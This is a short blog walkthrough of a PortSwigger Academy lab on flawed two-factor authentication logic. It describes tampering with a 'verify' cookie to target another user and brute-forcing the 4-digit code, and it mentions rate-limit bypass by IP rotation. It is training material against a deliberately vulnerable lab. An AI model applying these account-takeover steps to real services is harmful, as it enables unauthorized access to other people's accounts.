Portswigger Academy: 2FA Broken Logic

Jun Takemura · May 22, 2025

2FA Broken Logic

Task

This lab’s two-factor authentication is vulnerable due to its flawed logic. To solve the lab, access Carlos’s account page.

  • Your credentials: wiener:peter
  • Victim’s username: carlos

You also have access to the email server to receive your 2FA verification code.

Attempt

First log in as wiener:peter. Pass the 2FA using the code you got via email.

The post request for a 2FA login uses Cookie: verify=wiener; session=BSHMC8VICpQ5EPuR4NuMvrNeauC6yaYV. I simply changed wiener to carlos and sent a request. (Note that before doing this you also need to modify a get request to change wiener to carlos; this will generate a 2FA code for carlos.)

Of course the security code I used was wrong. So I went brute force that code. Since the code is only 4 letters, if there isn’t any rate limit I should be able to easily crack it.

Generate 4-digit numbers and copy it to the clipboard:

seq -w 0 9999 | xclip -selection clipboard

Don’t forget that -w option as it prepends 0 to numbers.

Thoughts

Sometimes brute-forcing 2FA code even works for a major website. Take a look at this vulnerability in Instagram. Though they implemented rate limit, you could bypass it with ip rotation and abusing race condition.

Twitter, Facebook